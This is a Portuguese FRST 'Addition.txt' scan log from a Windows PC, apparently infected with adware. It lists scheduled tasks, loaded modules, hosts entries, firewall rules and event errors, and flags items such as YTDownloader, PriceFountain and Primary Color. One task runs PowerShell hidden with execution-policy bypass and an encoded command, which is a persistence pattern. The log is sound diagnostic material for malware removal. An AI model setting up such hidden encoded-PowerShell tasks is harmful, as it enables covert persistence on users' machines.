Task: {3481650B-E414-44F1-B51D-989A194B8AC7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {36CBCE00-E4DC-48FF-8F62-FC4122F74571} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {394E9DA8-D907-4BA9-847A-50738F100223} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {3994915F-A6BA-4FFE-B71E-0B0A78A88757} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {3B83B638-0528-47DA-940C-C775CBA06E33} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {3BAD3942-517B-4378-BA98-B4359B1D34A1} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {3C213F73-125C-43F9-A3CE-5C3A71035568} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {4699AA4D-5C8F-432F-9B25-B5710891A136} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {49B16C2C-361F-4C20-990F-18421019866A} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {4A5F4C5A-AEAF-4E30-910A-0547FB879C9E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-21] (Google Inc.)
Task: {4F30F091-6DCB-492E-9EB9-9727C64738D1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-21] (Google Inc.)
Task: {57C71130-A89F-470B-896E-938C4E93DB5C} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {5948CF5B-25E0-43F1-9440-DC6E2E98ACB7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {5C58FE79-832B-46F5-8698-B76A501A9B01} - System32\Tasks\{C9F78E47-73C5-4464-85A9-F349830D5225} => pcalua.exe -a C:\Users\Maollo\AppData\Roaming\istartpageing\UninstallManager.exe -c -ptid=cmi
Task: {5F9D2E28-00DB-4B06-A6A5-1116A23AC453} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {65757409-7571-4EAB-9D03-1AEF4A86EBAD} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {66E5372C-E24B-44A5-830A-2342535BF35B} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {670F50F7-2BFE-4F76-9E2F-4B930786A40B} - System32\Tasks\{2DEA0299-761D-49B0-B1A6-C4BEE02CC1CA} => pcalua.exe -a C:\Users\Maollo\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {6AE418DB-C758-4A41-96CF-3E7BBF51CB8D} - \ShopperPro3 -> Nenhum Arquivo <==== ATENÇÃO
Task: {6FCC5CE2-36DE-4798-A1CC-77102F97AE2C} - \DriverToolkit Autorun -> Nenhum Arquivo <==== ATENÇÃO
Task: {7238B8B4-7C5B-4C4F-95E2-0A7AFC2ED94E} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {74A1C236-5E52-434B-BBDE-1390CC19C7FC} - System32\Tasks\SpeedUpMyPC Startup => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: {74F8DD19-C674-481F-8982-046D6B6F8D4E} - \Varredura ByteFence -> Nenhum Arquivo <==== ATENÇÃO
Task: {75B5BE22-1C42-42DE-93D7-9B3AEFB0C75A} - System32\Tasks\{0E7F0E47-790E-0908-0F11-0C790E0E110E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
Task: {8CD90AB7-3EC2-460D-841E-6FB4E152AD44} - System32\Tasks\{A9840AB3-C8AC-45B3-AA06-90787B2340A0} => pcalua.exe -a C:\ProgramData\WebShield\uninstall.exe -c /kb=y /ic=1
Task: {8DB755BE-CB86-4DA0-9411-D3E045DA2D69} - System32\Tasks\SpeedUpMyPC Maintenance => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: {911BC430-8073-4008-A838-4D5F078AC245} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {913A066F-CF6A-42EB-AED2-AAF73676EF07} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {94C6D46C-32AB-4E3F-8FCD-1872520E868E} - \YTDownloader -> Nenhum Arquivo <==== ATENÇÃO
Task: {9CA240A6-14DC-4AEA-BA8A-0B6BB6D685A0} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2016-01-20] (Overwolf LTD)
Task: {A5E5357E-4CEF-4724-9E67-E1F8C6F1F160} - \svchost -> Nenhum Arquivo <==== ATENÇÃO
Task: {ACB3F477-663F-426C-995B-10CB80723D7D} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AEA5AE40-2F28-4297-BE6A-930997293C38} - System32\Tasks\update-S-1-5-21-2840682155-2406404488-1448223199-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {B134AD5C-2C0A-4A3A-B799-7617ACAEBA18} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {B9478192-6F43-4D79-9180-E84DF8F6B88C} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {C2DA11FC-25B7-481B-9E89-8C22633B5D4A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {C6F759A2-2FB6-4AC4-B1EE-E77AEB7A95C0} - System32\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691} => C:\Program Files (x86)\updateservice\updateservice.exe [2016-01-20] ()
Task: {CA9DE1D8-2B97-44FC-BDAA-913D2D1605E8} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {CFF1BD3E-7D4E-41EC-9A6F-1D765C069F84} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D721F0A2-E92D-46FE-9314-351732258B89} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {DAFDA9FC-B24A-401D-BA43-66EB781345AB} - \ByteFence -> Nenhum Arquivo <==== ATENÇÃO
Task: {DB9A2CEE-1D64-46EB-BAA6-D078A5736966} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {E43B6080-1FCF-44E9-AA73-0B116FCA9E11} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {E9695163-E9C1-4F0D-90B8-6D1093973577} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {EEBC4C79-46EA-4326-BD61-F83DFB30EDA1} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {EF9C6595-D718-44D4-AE9F-F1D78B92C5AC} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {F5B6289A-B349-4B79-9A3B-8801F64C2191} - \Pritc -> Nenhum Arquivo <==== ATENÇÃO
Task: {F8569DBF-E336-4EF1-8805-CC298EDF6CFE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {F8788B93-8AA2-4169-80BD-C79AB6C0196B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {FCD5B1E4-4B57-436C-801C-BE81FB1F2A86} - \YTDownloaderUpd -> Nenhum Arquivo <==== ATENÇÃO
Task: {FE9C5073-7E53-494E-AB3E-C113A6433D69} - System32\Tasks\PFExe => C:\WINDOWS\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO
Task: {FEBA3D40-5CFC-4FEC-ABA0-8E9080C47DEB} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-10] (Microsoft Corporation)
Task: {FF832CDD-1F93-4270-9F98-B2653A446B8F} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\Launch 4540.job => C:\Program Files (x86)\YTDownloader\YTDownloader.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\SpeedUpMyPC Startup.job => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691}.job => C:\Program Files (x86)\updateservice\updateservice.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2015-12-31 14:05 - 2015-12-31 13:51 - 00768352 _____ () C:\Windows\system32\Dileiho64.dll
2015-10-30 05:18 - 2015-10-30 05:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-05 21:15 - 2015-12-11 00:07 - 00613968 _____ () C:\Program Files (x86)\360\Total Security\MenuEx64.dll
2016-02-11 10:34 - 2016-02-11 10:34 - 02364928 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.10\deploy\LoLLauncher.exe
2016-02-11 10:34 - 2016-02-11 10:34 - 04287488 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\LoLPatcher.exe
2015-11-02 15:14 - 2015-11-02 15:14 - 00074752 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\LolClient.exe
2016-02-05 22:41 - 2016-02-11 10:21 - 00662952 _____ () C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe
2016-01-06 15:14 - 2016-01-06 15:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-02-03 22:11 - 2016-02-03 22:12 - 00417792 _____ () c:\windows\nci.exe
2016-02-03 22:12 - 2016-02-03 22:12 - 00408576 _____ () c:\windows\mnci.exe
2016-01-16 13:21 - 2016-01-04 23:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-16 13:21 - 2016-01-04 23:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 13:21 - 2016-01-16 03:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 13:21 - 2016-01-16 03:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-05 19:14 - 2016-02-11 11:14 - 00662952 _____ () C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe
2016-02-05 22:42 - 2016-02-11 02:37 - 00115112 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe
2016-02-05 22:42 - 2016-02-11 02:38 - 00353192 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.PurBrowse64.exe
2016-02-05 22:42 - 2016-02-11 08:37 - 00107944 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe
2016-02-05 22:42 - 2016-02-11 08:37 - 00125864 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe
2016-01-05 21:15 - 2015-12-11 00:07 - 00615032 _____ () C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
2016-01-05 21:15 - 2015-12-11 00:07 - 00088184 _____ () C:\Program Files (x86)\360\Total Security\deepscan\qutmload.dll
2016-02-05 22:37 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll
2015-12-16 22:20 - 2015-12-11 01:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 22:20 - 2015-12-11 01:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
2016-02-11 10:34 - 2016-02-11 10:34 - 01458176 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\RiotLauncher.dll
2015-11-02 14:17 - 2015-11-02 14:17 - 04885152 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\Adobe AIR\Versions\1.0\Resources\WebKit.dll
2015-11-02 14:17 - 2015-11-02 14:17 - 17414304 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-01-19 21:25 - 2016-01-19 14:06 - 16792256 _____ () C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.286\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)


==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)


==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-14 00:34 - 2016-02-11 10:29 - 00001110 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)


==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{2CD90DA4-F729-4BCE-9922-6196FDB45093}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{18756391-BC3F-416C-A010-049CDD907728}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{B2C4C8BA-D491-4E8A-9CE3-D567426A7709}] => (Allow) C:\Level Up\Elsword\data\x2.exe
FirewallRules: [{AA1F30F4-61AD-4BCF-BAEE-4A11B5D06450}] => (Allow) C:\Level Up\Elsword\data\x2.exe
FirewallRules: [{B8BDAB7E-7F8E-4F43-8F76-B958AD6F7347}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [{A559DEEF-53EB-41CE-A351-4B4758BB9183}] => (Allow) C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe
FirewallRules: [TCP Query User{45723286-CEAA-4089-A8BB-EADF4593DADD}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{036A5353-1841-41FD-B027-B0A66BCA52F2}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{27E184CD-B51D-4003-B929-428D8BFED808}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [{667132CF-88F8-48B0-B88F-8C6C92BA554A}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [TCP Query User{56774337-CC8B-4DE7-A32E-A937B017863C}C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe
FirewallRules: [UDP Query User{37110AA9-1EE5-4CD3-A6B1-CD60BE6F2CE3}C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_71\bin\javaw.exe
FirewallRules: [{684C827C-0887-4E05-8B87-CC3205166006}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{FEB0B381-251E-40A3-83DC-82B925733EB6}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{D1CB5A7C-CF4E-4B24-B7CC-DEBCCCFD8505}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
FirewallRules: [{E4A177F7-B8D1-40F9-BF4F-E94115682869}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

==================== Pontos de Restauração =========================

03-02-2016 22:11:26 Uniblue DriverScanner installation
05-02-2016 22:40:32 Uniblue DriverScanner installation
10-02-2016 11:38:51 Windows Update

==================== Dispositivos Apresentando Falhas No Gerenciador =============


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (02/11/2016 11:09:23 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:46:13 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:42:31 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:40:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:40:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:36:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:28:37 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147024865. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (02/11/2016 10:23:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Maollo-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.


Erros de Sistema:
=============
Error: (02/11/2016 11:21:28 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Util Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 2 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:18 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (02/11/2016 11:14:15 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço The Calendar Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:13:43 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço NVIDIA Display Driver Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:13:39 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço nci foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (02/11/2016 11:09:51 AM) (Source: WAS) (EventID: 5175) (User: )
Description: O adaptador de escuta que serve o protocolo 'net.pipe' foi desconectado inesperadamente.

Error: (02/11/2016 11:09:23 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca

Error: (02/11/2016 10:46:13 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca

Error: (02/11/2016 10:42:31 AM) (Source: DCOM) (EventID: 10010) (User: Maollo-PC)
Description: CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mca


CodeIntegrity:
===================================
Date: 2016-02-11 10:21:10.940
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-10 21:06:46.382
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-01 16:32:28.564
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Overwolf\0.92.3.0\x64\OWExplorer.dll that did not meet the Store signing level requirements.

Date: 2016-01-28 17:49:53.224
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-22 10:54:24.431
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-16 14:26:44.401
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-16 13:09:25.755
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-08 16:59:38.272
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-08 11:37:54.019
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-07 07:22:39.805
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Informações da Memória ===========================

Processador: Pentium(R) Dual-Core CPU E5700 @ 3.00GHz
Percentagem de memória em uso: 57%
RAM física total: 4095.24 MB
RAM física disponível: 1748.73 MB
Virtual Total: 8191.24 MB
Virtual disponível: 5264.65 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:243.6 GB) (Free:140.79 GB) NTFS
Drive d: (DADOS) (Fixed) (Total:687.37 GB) (Free:503.92 GB) NTFS
Drive f: (Reservado pelo Sistema) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[sistema com componentes de inicialização (obtido através de drive)]

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 573DA60E)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=243.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=687.4 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================
